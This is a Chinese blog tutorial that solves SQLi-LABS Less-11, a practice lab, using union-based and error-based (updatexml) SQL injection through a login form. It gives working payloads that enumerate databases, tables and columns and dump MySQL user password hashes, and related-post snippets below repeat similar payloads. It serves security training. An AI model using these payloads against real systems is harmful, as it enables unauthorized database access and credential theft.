SQLi LABS Less-11 联合注入+报错注入

已于 2022-03-14 15:43:56 修改
阅读量1.5w 收藏 3
点赞数 11
分类专栏: SQLi-LABS 靶场通关教程 文章标签: 安全 网络安全
于 2021-06-27 21:39:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyuxiang946/article/details/118280235
版权

第十一关是单引号字符型注入,推荐使用联合注入、报错注入

方式一:联合注入

参考文章:联合注入使用详解 原理+步骤+实战教程

第一步、判断注入类型

用户名输入: a' or 1 -- a

密码随便输入:1

页面正常显示。

 用户名输入:a' or 0 -- a

密码随便输入:1

页面异常(空)显示。

 确定注入点为:单引号字符型注入。

第二步、判断字段数

用户名依次输入:

a' order by 1 -- a

a' order by 2 -- a

a' order by 3 -- a

密码随便输入:1

 按照第3个字段排序时开始报错,确定返回结果的字段数为 2。

第三步、判断显示位

用户名输入:a' union select 1,2 -- a

密码随便输入:1

 第四步、脱库

获取所有数据库,用户名输入:

a' union select 1,(
    select group_concat(schema_name) 
    from information_schema.schemata 
)  -- a

 密码随便输入:1

获取 security 库的所有表,用户名输入

a' union select 1,(
    select group_concat(table_name) 
    from information_schema.tables
    where table_schema="security"
)  -- a

密码随便输入:1

 获取 users 表的所有字段,用户名输入:

a' union select 1,(
    select group_concat(column_name) 
    from information_schema.columns
    where table_schema="security" and table_name="users"
)  -- a

密码随便输入:1

 获取数据库用户的密码,用户名输入:

a' union select 1,(
    select group_concat(user,password) 
    from mysql.user where user = 'mituan'
)  -- a

密码随便输入:1

 方式二:报错注入

推荐文章:报错注入使用详解 原理+步骤+实战教程

第一步、判断是否报错 

用户名输入:a'

密码随便输入:1

 页面显示数据库的报错信息,适合使用报错注入。

第二步、判断报错条件

用户名输入:a' and updatexml(1,0x7e,3) -- a

密码随便输入:1

 页面正常显示报错信息,确定报错函数可以使用。

第三步、脱库

获取所有数据库,用户名输入:

a' and updatexml(1,concat(0x7e,
	substr((
		select group_concat(schema_name)
		from information_schema.schemata
	),33,31)
),3) -- a

 密码输入:1

获取 security 库的所有表,用户名输入:

a' and updatexml(1,concat(0x7e,
	substr((
		select group_concat(table_name)
		from information_schema.tables
		where table_schema="security"
	),1,31)
),3) -- a

密码随便输入:1

 获取 users 表的所有字段,用户名输入:

a' and updatexml(1,concat(0x7e,
	substr((
		select group_concat(column_name)
		from information_schema.columns
		where table_schema="security" and table_name="users"
	),1,31)
),3) -- a

密码随便输入:1

获取数据库用户的密码,用户名输入:

a' and updatexml(1,
	concat(0x7e,(
        select group_concat(user,password) 
        from mysql.user where user = 'mituan'
    ))
,3) -- a

密码随便输入:1

推荐专栏

《网络安全快速入门》 用最短的时间,掌握最核心的网络安全技术。

《靶场通关教程》 各个靶场的通关教程,持续更新……

士别三日wyx
关注
  • 11
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中的mysql账号密码进行安装数据库的创建 介绍几个函数:   (1)version():查看数据库版本   (2)user():查看当前用户   (3)database():查看使用的数据库   (4) limit :limit子句来分批获取所有数据   (5)group_concat():一次性获取数据库信息。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
mysql注入-sqlilabs靶场注入
10-15
sqlilabs靶场全部关卡的详细解析,pdf文档
sqli-labs第11-20关
永远相信美好的事情即将发生
12-15 3765
Less-11 进入后是个登录页面,应该是基于post的注入,这边准备用hackbar注入,方便一点。看一下源码,两个框的名字分别是uname和passwd 先提交1试试效果 登陆失败,再加一个单引号试试,密码框不输(若是输入密码,报错出来的信息更少;也可同时输入单双引号,这个效果一样) 有报错回显,存在注入,且回显的错误为:‘1’’ and password=’’ LIMIT 0,1。其中1’是我输进去的,另外还有成对的单引号出现,可以看出是字符型。由此猜测sql语句为:select usernam
sql注入11
qq_45751902的博客
03-14 3953
这关采用post的方式传参 定闭合符 使用’ or 1=1 # 回显正常 使用" or 1=1 #,回显报错(可以尝试更多的闭合符,这里就不一一实现了) 实现原理 查询列数 ’ order by 2 # ’ order by 3 # 所以有两列 找显示位 查数据库名 'union select 1,database()# 查表名 ' union select 1,group_concat(table_name) from information_schema.tables where tab
Sqli-LABS通关笔录-11[sql注入之万能密码以及登录框报错注入]
aiquan9342的博客
12-02 424
在这一关卡我学到了 1.万能密码的构造,大概的去揣测正常的SQL语句是如何的。 2. 3. 00x1SQL万能密码的构造 在登录框当中可以添加了一个单引号。报错信息如下所示: 据此报错,我们大概的可以猜测其网站的正常是SQL语句如下: $sql="select username,password from 表明 where username='$u...
SQL注入】Less-11基于错误的POST单引号字符型注入
Mitchell_Donovan的博客
03-30 420
Less-11基于错误的POST单引号字符型注入 首先,这个是在用户登陆进行查询引发的post型sql注入,和get差异很大;然后我们已知其中有个用户名dumb,密码dumb;进行登陆看看! 另外本实验将会用到extractvalue()该mysql报错型函数进行sql注入;在登陆界面 输入dumb用户名 输入dumb密码 然后我们得到的拦截请求 提交post数据包uname=dumb&passwd=dumb&submit=Submit 不对它进行任何数据包修改,进行发送请求 这
sqli-lab教程——Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)
luosaierdadi的博客
07-09 235
模拟真实环境,我们作为Dump用户使用Dump密码登陆,可以看到以下 登陆成功此时打开hackbar选中post可以看到,已经自动载入的刚才提交的表单数据: 我刚测试了一下,hackbar提交uname=admin' and 1=2 --+&passwd=admin&submit=Submit作为post参数时,无论and后面是1=1还是1=2,都能登陆,不知道为什么,可能是提交的时候自动加了+号连接语句的问题。所以现在改用burpsuit,抓包修改参数。 输入admin admin 登陆,抓包,发送到re
sql注入sqli-labs(less11-less20)
小宇的web博客
03-17 765
sql注入sqli-labs(less11-less20)特详解 less11 1.输入用户名和密码admin和admin查看输出 2.利用burpsuite来进行抓包(这个抓包软件需要java环境自行配置和下载直接度娘,burp下载后还需要自行把火狐浏览器的代理服务器配置)。 3.打开burpsuite来进行抓包(uname=admin&passwd=admin&submit=Submit这个就是抓包的数据) 4.将这个数据复制后打开火狐浏览器,复制到指定的位置。(这时必须关闭bu
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sql注入Less11-20
weixin_62420492的博客
12-19 338
sqli-lab(11)
qq_53030229的博客
05-03 581
文章目录一、判断注入点二、判断回显字段三、获取数据库四、获取数据表五、获取字段六、获取username、password 一、判断注入点 首先,我们使用burpsuit抓包,个人认为这样比较方便吧,你们也可以使用其他方式,基本过程都一样 二、判断回显字段 这里回显字段是有两个,看下图,如果回显字段为3时,响应显示报错,字段为2是则没有报错 三、获取数据库 uname=1234'union select 1,updatexml(1,concat(0x7e,(select database()),0x7e
sqli-labs第11关到18关
gclome的博客
11-09 1157
Less-11 (基于错误的POST型单引号字符型注入) 打开这个页面,是这样的 在username和password都输入admin,登陆成功,而且上面的post data也已经自动载入输入的表单数据。 当然这一步还可以用burp suite进行抓包,send to repeater 通过修改post的值就可以进行注入 输入uname=admin' and 1=1%23 &passwd...
sqli-labs 11~14 多命通关攻略(报错注入
两个月亮
01-16 506
由于该关卡中会提示错误信息,所以我们可以通过报错注入来爆破数据库。
sqli-labs:less-11/12 简单SQL注入和身份验证漏洞综合
Zeker62的博客
08-31 214
这两个靶场是一样的题,我就拿less-12说事了吧 首先,尝试胡乱输入密码进行测试: 发现存在报错,这时用admin和admin这个正确的账号密码进行测试(1~10前面的题目告诉了) 发现有着正确的提示: 但是还不够,我们尝试在username后面加上单引号: 发现正常报错 加上双引号尝试(没输入密码) 存在报错,这个就是SQL注入点:You have an error in your SQL ...
Sqlilabs通关(Less11-Less20)
wcl20010的博客
05-11 502
这十关都是POST型,使用burpsuit或者使用火狐浏览器的插件hackbar。 hackbar链接:链接:https://pan.baidu.com/s/1bIP9lOBUtoH3_D5Apkmi2w 提取码:7odr 这里我的hackbar是破解版的。注意添加后禁止更新,当然可以去插件中间下载一个新版,平时使用它,不付费不能使用post等提交请求。但是我这破解版的,再提交表单后无法发现是post还是get。挺无语的。搭配使用吧。 less-11 基于错误的POST型单引号字符型注入 这就是我上
sqlilab学习打卡|手工注入|Less11-Less22
spring!
03-31 1084
sqlilab 通关|Less11-Less22
sql报错型注入-sqli-labs第11
weixin_46784800的博客
11-03 515
获取数据的操作 判断是否为字符型注入 passwd=1' or '1'='1 &uname=1' or '1'='1 输入post参数判断是否为字符型注入 判断数据库中含有多少列 通过查询语句: uname=1'or 1=1 order by 3 -- -&passwd=1' or 1=1 -- - 可发现报错:Unknown column ‘3’ in ‘order clause’,则可说明查询的数据库中只有两列,则可确定后续的联合查询的参数数量。 判断界面输出与数据库的接口
sqli-labs-less-7
最新发布
09-26
sqli-labs less-7是一个web注入实验,它是用来学习SQL注入的。在这个实验中,我们需要使用不同的注入技术来绕过应用程序的安全措施,并从数据库中获取敏感信息。在这个具体的题目中,我们需要使用UNION SELECT语句来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值